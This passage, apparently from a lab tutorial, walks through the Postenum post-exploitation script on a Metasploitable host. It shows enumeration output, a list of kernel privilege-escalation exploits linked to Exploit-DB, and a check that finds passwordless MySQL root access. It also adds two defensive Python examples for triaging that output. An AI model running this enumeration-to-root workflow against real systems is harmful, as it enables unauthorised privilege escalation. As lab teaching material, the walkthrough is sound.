-rw-r--r-- 1 root root 5376 Jun 19 13:22 /var/log/wtmp
-rw-r--r-- 1 root root 96 Mar 16  2010 /var/log/installer/lsb-release
-rw-r--r-- 1 root root 0 Mar 16  2010 /var/log/installer/initial-status.gz
-rw-r--r-- 1 root root 58721 Mar 16  2010 /var/log/installer/status
-rw-r--r-- 1 root root 46866 Mar 16  2010 /var/log/installer/hardware-summary
-rw-r--r-- 1 root adm 16950 Jun 19 13:41 /var/log/dmesg.0
-rw-r--r-- 1 root root 292114 Jun 19 13:20 /var/log/udev
-rw-r--r-- 1 root adm 6419 Jun 19 13:52 /var/log/dmesg.4.gz
-rw-r--r-- 1 root adm 6405 Jun 19 13:21 /var/log/dmesg.3.gz
-rw-r--r-- 1 root news 0 Mar 16  2010 /var/log/news/news.crit
-rw-r--r-- 1 root news 0 Mar 16  2010 /var/log/news/news.notice
-rw-r--r-- 1 root news 0 Mar 16  2010 /var/log/news/news.err
-rw-r--r-- 1 root root 0 May 20  2012 /var/log/boot
-rw-r--r-- 1 root adm 6446 Jun 19 13:20 /var/log/dmesg.2.gz
-rw-r--r-- 1 root root 0 May 20  2012 /var/log/btmp
-rw-r--r-- 1 root adm 6414 Jun 19 13:21 /var/log/dmesg.1.gz
-rw-r--r-- 1 root root 292292 Jun 19 13:22 /var/log/lastlog
-rw-r--r-- 1 root adm 16992 Jun 19 13:21 /var/log/dmesg

[+] - List NFS shares and permisisons
[x] NFS:
-rw-r--r-- 1 root root 367 May 13  2012 /etc/exports

It starts by checking for any interesting files located in the standard web server directories. Next, it searches for hidden files, SSH files, and any clear-text passwords in the home directories. It then checks SUID, SGID, and sticky bits. Finally, it looks for any writable and executable directories, and includes any NFS shares present on the system.
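Most of that listing is benign (SUID on su and mount, sticky /tmp, world-writable device nodes), so what a defender wants is a way to separate the expected entries from the ones worth a look. The following added example, which is not part of Postenum, parses ls -l and find -ls lines like those above and flags SUID-root binaries outside a constructed baseline allowlist, world-writable directories that lack the sticky bit, and world-writable regular files; the allowlist and the sample lines are constructed for the example.

```python
"""Turn ls -l / find -ls lines like those in the Postenum output above into
permission findings a defender would triage. Added example, not Postenum code."""
import re
MODE_RE = re.compile(r"^[-dlcbps][rwxsStT-]{9}$")

# Constructed example allowlist of SUID-root binaries expected on the host;
# it is not complete, and anything outside it is reviewed by hand.
SUID_BASELINE = {"/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
                 "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/sudoedit",
                 "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp"}

def parse_entry(line):
    """Return (mode, owner, group, path) from an ls -l or find -ls line,
    or None when no 10-character mode field is present."""
    tokens = line.split()
    for i, tok in enumerate(tokens):
        if MODE_RE.match(tok) and len(tokens) >= i + 4:
            return tok, tokens[i + 2], tokens[i + 3], tokens[-1]
    return None

def findings(line):
    """List the findings for one entry; an empty list means nothing to flag."""
    entry = parse_entry(line)
    if entry is None:
        return []
    mode, owner, _group, path = entry
    kind, world_w, sticky = mode[0], mode[8] == "w", mode[9] in "tT"
    out = []
    if mode[3] in "sS" and owner == "root" and path not in SUID_BASELINE:
        out.append("suid-root-not-in-baseline")
    if kind == "d" and world_w and not sticky:
        # Without the sticky bit any user may delete or rename others' files here.
        out.append("world-writable-dir-without-sticky")
    if kind == "-" and world_w:
        out.append("world-writable-file")
    return out  # devices, sockets and sticky dirs (/dev/null, /dev/log, /tmp) pass

def audit(lines):
    """Map each flagged path to its findings, skipping benign entries."""
    return {parse_entry(ln)[3]: findings(ln) for ln in lines if findings(ln)}

# Constructed sample, copied from the listing above.
SAMPLE = [
    "-rwsr-xr-x 1 root root 25540 Apr  2  2008 /bin/su",
    "-rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap",
    "drwxrwxrwt 4 root root 4096 Jun 19 13:23 /tmp",
    "drwxrwxrwx 2 www-data www-data 4096 Feb  1  2003 /var/www/twiki/data/Sandbox",
    "304795    4 -rw-rw-rw-   1 root     daemon          1 Aug  8  2018 /lib/tls/i686/cmov/.4tJrYgzxS.so",
]
```

Running audit(SAMPLE) flags /usr/bin/nmap, the twiki Sandbox directory and the hidden .so file, and passes /bin/su and /tmp.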

Step 9 Get OS & Kernel Information

The next option we will look at provides information about the operating system and suggests any relevant kernel exploits that could potentially be used to escalate privileges and obtain root. Use the -o switch for this:

target:/var/tmp$ ./postenum.sh -o

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] OPERATING SYSTEM
[+] - Check current user and group information
[x] The current user and group information:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[x] The current user:
www-data

[+] - Check distribution type and version number
[x] The distribution type and version:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"

[+] - Check kernel version
[x] Kernel version and (32-bit/64-bit):
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

[x] Kernel version and gcc version used to compile the kernel:
Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008

[+] - Exploits
[x] Possible exploits for linux kernel 2.6.24:
Listing the most popular exploits for kernel 4*
------------------------------------------------------
 Linux Kernel 2.6.39 < 3.2.2 Gentoo / Ubuntu x86-x64 Mempodipper(1) - https://www.exploit-db.com/exploits/18411
 Linux Kernel 2.6.39 < 3.2.2 x86-x64 Mempodipper(2) - https://www.exploit-db.com/exploits/35161
 Linux Kernel 3.7.6 (RedHat x86/x64) - https://www.exploit-db.com/exploits/27297
 Linux Kernel 3.13 < 3.19 Ubuntu 12.04/14.04/14.10/15.04 - https://www.exploit-db.com/exploits/37292
 Linux Kernel 3.13 SGID - https://www.exploit-db.com/exploits/33824
 Linux Kernel 3.13.1 (Metasploit) - https://www.exploit-db.com/exploits/40503
 Linux Kernel 3.14.5 (CentOS 7 / RHEL) - https://www.exploit-db.com/exploits/35370
 Linux Kernel 3.x (Ubuntu 14.04/Mint 17.3/Fedora 22) https://www.exploit-db.com/exploits/41999
 Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - https://www.exploit-db.com/exploits/44298
 Linux kernel < 4.10.15 Race Condition - https://www.exploit-db.com/exploits/43345
 Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - https://www.exploit-db.com/exploits/45010
 Linux Kernel 2.6.22 < 3.9 Dirty Cow - https://www.exploit-db.com/exploits/40839
 Linux Kernel 2.6.22 < 3.9 Dirty Cow (x86-x64) - https://www.exploit-db.com/exploits/40616

The most specific exploits for your kernel 2.6.24
------------------------------------------------------
Nothing extract from exploits, for kernel 2.6.24

First, it gives us the current user and group information. Then it shows us the distribution name and release number, followed by the kernel version and information about how the kernel was compiled. Next, it lists possible exploits based on the kernel version, along with links to their Exploit Database pages.

Finally, there is one last option for Postenum: the ability to run all of these options at once. Use the -a switch for this:
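Note that the "most popular" list is not filtered by version (it is headed "kernel 4*" although the host runs 2.6.24), so when triaging that output it is worth checking which advisory titles actually cover the reported kernel. The following added example, which is not part of Postenum, does that comparison under assumed semantics for the version strings in the titles ("A < B" as a half-open range, a lone "< B" as only an upper bound, "3.x" as a major series, a bare version as a prefix); the titles are copied from the listing above with their URLs omitted.

```python
"""Check which advisory titles in a Postenum-style exploit listing cover a
given kernel version. Added example, not part of Postenum."""
import re
# Assumed semantics for the listing's version strings (the tool does not
# document them): "A < B" means A <= kernel < B, a lone "< B" is only an
# upper bound, "3.x" means any 3.* kernel, and a lone version is a prefix.
ENTRY_RE = re.compile(
    r"Linux [Kk]ernel\s+(?:(\d+(?:\.\d+)*|\d+\.x)\s+)?(?:<\s*(\d+(?:\.\d+)*))?")

# Entry titles copied from the listing above (URLs omitted).
LISTING = [
    "Linux Kernel 2.6.39 < 3.2.2 Gentoo / Ubuntu x86-x64 Mempodipper(1)",
    "Linux Kernel 3.13 < 3.19 Ubuntu 12.04/14.04/14.10/15.04",
    "Linux Kernel 3.13 SGID",
    "Linux Kernel 3.x (Ubuntu 14.04/Mint 17.3/Fedora 22)",
    "Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4)",
    "Linux kernel < 4.10.15 Race Condition",
    "Linux Kernel 2.6.22 < 3.9 Dirty Cow",
]

def parse_version(text):
    """'2.6.24-16-server' -> (2, 6, 24); build suffixes are dropped."""
    return tuple(int(p) for p in re.match(r"\d+(?:\.\d+)*", text).group().split("."))

def applicability(entry, kernel):
    """Classify one title for a kernel tuple such as (2, 6, 24): 'covered',
    'not-covered', or 'unbounded-below' (only an upper bound stated; read the advisory)."""
    m = ENTRY_RE.search(entry)
    if not m:
        return "not-covered"
    lower, upper = m.group(1), m.group(2)
    if lower and lower.endswith(".x"):        # "3.x": the whole major series
        return "covered" if kernel[0] == int(lower[:-2]) else "not-covered"
    lo = parse_version(lower) if lower else None
    hi = parse_version(upper) if upper else None
    if lo and hi:
        return "covered" if lo <= kernel < hi else "not-covered"
    if hi:                                    # "< B" alone: lower bound unknown
        return "unbounded-below" if kernel < hi else "not-covered"
    if lo:                                    # bare version: prefix match
        return "covered" if kernel[:len(lo)] == lo else "not-covered"
    return "not-covered"

def triage(listing, uname_release):
    """Group titles by applicability to a uname -r string like 2.6.24-16-server."""
    kernel = parse_version(uname_release)
    groups = {"covered": [], "unbounded-below": [], "not-covered": []}
    for entry in listing:
        groups[applicability(entry, kernel)].append(entry)
    return groups
```

For 2.6.24-16-server only the Dirty Cow range covers the host, the two bare "< B" entries land in the unbounded-below group for manual review, and the rest are not applicable, which is a different answer from both of the tool's lists.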

target:/var/tmp$ ./postenum.sh -a

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] OPERATING SYSTEM
[+] - Check current user and group information
[x] The current user and group information:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[x] The current user:
www-data

[+] - Check distribution type and version number
[x] The distribution type and version:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"

[+] - Check kernel version
[x] Kernel version and (32-bit/64-bit):
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

[x] Kernel version and gcc version used to compile the kernel:
Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008

[+] - Exploits
[x] Possible exploits for linux kernel 2.6.24:
Listing the most popular exploits for kernel 4*
------------------------------------------------------
 Linux Kernel 2.6.39 < 3.2.2 Gentoo / Ubuntu x86-x64 Mempodipper(1) - https://www.exploit-db.com/exploits/18411
 Linux Kernel 2.6.39 < 3.2.2 x86-x64 Mempodipper(2) - https://www.exploit-db.com/exploits/35161
 Linux Kernel 3.7.6 (RedHat x86/x64) - https://www.exploit-db.com/exploits/27297
 Linux Kernel 3.13 < 3.19 Ubuntu 12.04/14.04/14.10/15.04 - https://www.exploit-db.com/exploits/37292
 Linux Kernel 3.13 SGID - https://www.exploit-db.com/exploits/33824
 Linux Kernel 3.13.1 (Metasploit) - https://www.exploit-db.com/exploits/40503
 Linux Kernel 3.14.5 (CentOS 7 / RHEL) - https://www.exploit-db.com/exploits/35370
 Linux Kernel 3.x (Ubuntu 14.04/Mint 17.3/Fedora 22) https://www.exploit-db.com/exploits/41999
 Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - https://www.exploit-db.com/exploits/44298
 Linux kernel < 4.10.15 Race Condition - https://www.exploit-db.com/exploits/43345
 Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - https://www.exploit-db.com/exploits/45010
 Linux Kernel 2.6.22 < 3.9 Dirty Cow - https://www.exploit-db.com/exploits/40839
 Linux Kernel 2.6.22 < 3.9 Dirty Cow (x86-x64) - https://www.exploit-db.com/exploits/40616

The most specific exploits for your kernel 2.6.24
------------------------------------------------------
Nothing extract from exploits, for kernel 2.6.24

[-] APPS and SERVICES
[+] - Check jobs scheduled
[x] Search on cron in /etc:
drwxr-xr-x  2 root     root     4096 Jul  5  2018 cron.d
drwxr-xr-x  2 root     root     4096 Apr 28  2010 cron.daily
drwxr-xr-x  2 root     root     4096 Mar 16  2010 cron.hourly
drwxr-xr-x  2 root     root     4096 Apr 28  2010 cron.monthly
drwxr-xr-x  2 root     root     4096 Mar 16  2010 cron.weekly
-rw-r--r--  1 root     root      724 Apr  8  2008 crontab

[x] List /etc/cron.d/
-rw-r--r-- 1 root root  507 May  3  2012 php5
-rw-r--r-- 1 root root 1323 Mar 31  2008 postgresql-common

...

[+] - List all available shells
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen

[-] TRYING ACCESS
[+] - Check for some methods for extract creds and get access as root
[x] Connect to MYSQL as root and non-pass:
[/] We can connect to the local MYSQL service as 'root' and without a password!
mysqladmin  Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486
Copyright (C) 2000-2006 MySQL AB
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL license

Server version          5.0.51a-3ubuntu5
Protocol version        10
Connection              Localhost via UNIX socket
UNIX socket             /var/run/mysqld/mysqld.sock
Uptime:                 41 min 2 sec

Threads: 2  Questions: 447  Slow queries: 0  Opens: 420  Flush tables: 1  Open tables: 64  Queries per second avg: 0.182

Be aware that this can take a little while, since it runs all of the options and collects a lot of information.
